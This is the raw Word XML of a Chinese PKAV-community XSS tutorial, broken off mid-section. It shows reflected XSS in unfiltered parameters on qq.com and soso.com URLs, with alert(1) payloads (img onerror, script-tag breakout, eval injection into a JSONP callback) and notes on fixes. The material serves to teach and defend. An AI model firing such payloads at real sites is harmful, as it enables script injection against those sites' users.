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7" w:rsidRPr="009A6E70" w:rsidRDefault="00C16395" w:rsidP="009C207F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一</w:t>
      </w:r>
      <w:r w:rsidR="00AD0511" w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>什么都没过滤的入门情况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</w:t>
      </w:r>
      <w:r w:rsidR="008B1341" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PKAV技术</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008B1341" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宅</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B1341" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="00907EC1" w:rsidP="009C207F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="3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</w:t>
      </w:r>
      <w:r w:rsidR="008B1341" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pkav.net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="0001093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907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XSS的存在，一定是伴随着输入，与输出2个概念的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="0001093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2.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>要想过滤掉XSS，你可以在输入层面过滤，也可以在输出层面过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019187A" w:rsidRPr="009C207F" w:rsidRDefault="0001093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3.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果输入和输出都没过滤。那么漏洞将是显而易见的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1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4.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为第一个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础的例子，我们拿出的是一个什么都没过滤（其实还是有些转义的，主要没过滤&lt;,&gt;）的例子。这种例子出现在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯这种</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>大网站的概率不是很高。但是还是让我找到了一个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2549F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5.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2549F" w:rsidRPr="009C207F" w:rsidTr="00D2549F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00D2549F" w:rsidRPr="009C207F" w:rsidRDefault="00D2549F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app.data.qq.com/?umod=commentsoutlet&amp;act=count&amp;siteid=3&amp;libid=9&amp;dataid=1480&amp;score=1&amp;func=haoping&amp;_=1353475261886</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00907EC1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6.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于上面这个例子。我们可以看到什么是输入，什么是输出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00616EE9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225AB179" wp14:editId="0C5724C2">
            <wp:extent cx="5274310" cy="10013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18" w:rsidRPr="009C207F" w:rsidRDefault="007A2497" w:rsidP="00F2158C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经过测试，我们发现，score这个【输入】参数，没有进行任何过滤，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即，输入是什么，输出就是什么？通俗点就是“吃什么，拉什么”。。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下图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00616EE9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0629E9FE" wp14:editId="11025BA4">
            <wp:extent cx="5274310" cy="1334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E9" w:rsidRPr="009C207F" w:rsidRDefault="007A2497" w:rsidP="00F2158C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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2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网页中看到的效果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00616EE9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2282560E" wp14:editId="7D2C28C1">
            <wp:extent cx="5274310" cy="2146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E9" w:rsidRPr="009C207F" w:rsidRDefault="007A2497" w:rsidP="00F2158C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907EC1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7.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>既然可以直接输入&lt;&gt;HTML标签，接下来的利用也就相对简单了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C7E84" w:rsidRPr="009C207F" w:rsidTr="007E6AFC">
        <w:trPr>
          <w:trHeight w:val="472"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8507" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009C7E84" w:rsidRPr="009C207F" w:rsidRDefault="009C7E84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app.data.qq.com/?umod=commentsoutlet&amp;act=count&amp;siteid=3&amp;libid=9&amp;dataid=1480&amp;score=&lt;imgsrc=1onerror=alert(1);&gt;&amp;func=haoping&amp;_=1353475261886</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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效果如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00616EE9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222473DE" wp14:editId="6B7DD9F2">
            <wp:extent cx="5276624" cy="26384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E9" w:rsidRPr="009C207F" w:rsidRDefault="007A2497" w:rsidP="00F2158C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907EC1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8.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修复方案：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种XSS属于最基本的一类XSS,也最好防御。。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它的模型是：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&lt;HTML标签&gt;&lt;/HTML标签</w:t>
      </w:r>
      <w:r w:rsidR="001443B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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[输出</w:t>
      </w:r>
      <w:r w:rsidR="001443B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]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&lt;HTML标签&gt;&lt;/HTML标签</w:t>
      </w:r>
      <w:r w:rsidR="001443B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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或&lt;HTML标签&gt;[输出]&lt;/HTML标签</w:t>
      </w:r>
      <w:r w:rsidR="00775D65" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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a.通常，我们只需要在输出前，将&lt;,&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>过滤掉即可</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。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b.这类XSS在小型网站中比较常见，在大型网站中少见。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c.这类XSS通常都被浏览器的XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>过滤器秒杀了</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，所以一般来说，威力较小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d.对于普通用户来说，请使用IE8及以上版本（并开启XSS过滤器功能，默认开启），或chrome浏览器，将可以防御大部分此种类型的XSS攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="00755F50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</w:t>
      </w:r>
      <w:r w:rsidR="009322B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)责任编辑：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xiaohui</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009A6E70" w:rsidRDefault="00C16395" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第二</w:t>
      </w:r>
      <w:r w:rsidR="00AD0511" w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出在</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;script&gt;&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的情况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</w:t>
      </w:r>
      <w:r w:rsidR="00FC1936" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>心伤的瘦子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="002D32F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</w:t>
      </w:r>
      <w:r w:rsidR="00971259" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：PKAV技术</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00971259" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宅</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00971259" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="00907EC1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:</w:t>
      </w:r>
      <w:r w:rsidR="002D32F2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.pkav.net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接着上面一个教程，我们继续。这个例子属于第一例的特殊情况，当然也有特殊解法。也属于非常常见的一种情况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7E6AFC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907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们找到这么一个点，也是输入和输出都未过滤的一个点。相比</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>教程第</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一例，其特殊之处在于，是输出在了&lt;script&gt;[输出]&lt;/script&gt;之间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E6AFC" w:rsidRPr="009C207F" w:rsidTr="00627548">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="007E6AFC" w:rsidRPr="009C207F" w:rsidRDefault="007E6AF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activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00907EC1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2.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如下图：callback参数未做过滤。在【查看源代码】下，我们可以看到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00775D65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561F11FF" wp14:editId="010251DC">
            <wp:extent cx="5274310" cy="17583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C1" w:rsidRPr="009C207F" w:rsidRDefault="007A2497" w:rsidP="00F2158C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5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缺陷网页源代码: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EF5C91" w:rsidRPr="009C207F" w:rsidTr="00EF5C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00EF5C91" w:rsidRPr="009C207F" w:rsidRDefault="00EF5C9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type='text/javascript'&gt;document.domain='soso.com';_ret={"_res":2};try{parent.aaa(_ret);}catch(err){aaa(_ret);}&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001443B2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3.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>碰到这种情况，我们一般有以下解法。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首先判断，是否过滤了&lt;,&gt;,/等符号，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A02DB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果都没有过滤，恭喜你，一般可以直接XSS了。代码如下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EF5C91" w:rsidRPr="009C207F" w:rsidTr="00EF5C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00EF5C91" w:rsidRPr="009C207F" w:rsidRDefault="00EF5C9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type='text/javascript'&gt;document.domain='soso.com';_ret={"_res":2};try{parent.aaa(_ret);}catch(err){aaa(_ret);}&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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原理入下图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00775D65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510B1FD1" wp14:editId="32D065ED">
            <wp:extent cx="5274310" cy="9302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5" w:rsidRPr="009C207F" w:rsidRDefault="007A2497" w:rsidP="00F2158C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6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907EC1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4.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构造callback参数后的源代码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EF5C91" w:rsidRPr="009C207F" w:rsidTr="00EF5C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00EF5C91" w:rsidRPr="009C207F" w:rsidRDefault="00EF5C9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type='text/javascript'&gt;document.domain='soso.com';_ret={"_res":2};try{parent.aaaaaaaaa&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;(_ret);}catch(err){aaaaaaaaa&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;(_ret);}&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EF5C91" w:rsidRPr="009C207F" w:rsidRDefault="00EF5C91" w:rsidP="009C207F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001443B2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lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果过滤了&lt;,&gt;，那么就无法使用上面的办法了。我们接着看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script代码里的构造。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友情提示：这里可能需要一点点javascript的知识才行哦～～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可以如下构造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EF5C91" w:rsidRPr="009C207F" w:rsidTr="00EF5C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00EF5C91" w:rsidRPr="009C207F" w:rsidRDefault="00EF5C9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activity.soso.com/common/setParentsInfo.php?callback=eval('alert(1)');void</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00775D65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6.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看到，源代码是下面的样子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00775D65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FE30199" wp14:editId="42C135E1">
            <wp:extent cx="5274310" cy="1336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97" w:rsidRPr="009C207F" w:rsidRDefault="007A2497" w:rsidP="00F2158C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7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907EC1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7.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是说，我们插入的内容，使得这一段javascript依然【语法正确】，能够【正确执行】，并且能够执行【我们所插入的JS代码】，这样我们的目的就达到了。</w:t>
      </w:r>
      <w:r w:rsidR="00AF0D33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构造后的源代码如下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B46C63" w:rsidRPr="009C207F" w:rsidTr="00B46C63">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B46C63" w:rsidRPr="009C207F" w:rsidRDefault="00B46C6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type='text/javascript'&gt;document.domain='soso.com';_ret={"_res":2};try{parent.eval('alert(1)');void(_ret);}catch(err){eval('alert(1)');void(_ret);}&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001443B2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8.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这种输出在JS代码里的情况十分常见，但是呢？不幸的是，像这样没过滤的情况，却不是很常见。例如：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vara="[输出]";//通常程序员会把"过滤掉，这样的话，一般来说，我们就很难构造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但是，这并不是说，就一定是不能利用，后面我们会</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拿腾讯一些</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>【比较有意思】的例子，来进一步说到这个【输出在js里】的情况的～</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE7298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9.</w:t>
      </w:r>
      <w:r w:rsidR="00FE7298" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001443B2" w:rsidRPr="009C207F" w:rsidRDefault="00FE729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类XSS的模型通常是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001443B2" w:rsidRPr="009C207F" w:rsidRDefault="00FE729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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;...[输出</w:t>
      </w:r>
      <w:r w:rsidR="001443B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]...&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001443B2" w:rsidRPr="009C207F" w:rsidRDefault="00FE729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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;...[输出</w:t>
      </w:r>
      <w:r w:rsidR="001443B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]...&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001443B2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9.</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FE7298" w:rsidRPr="009C207F">
        <w:rPr>
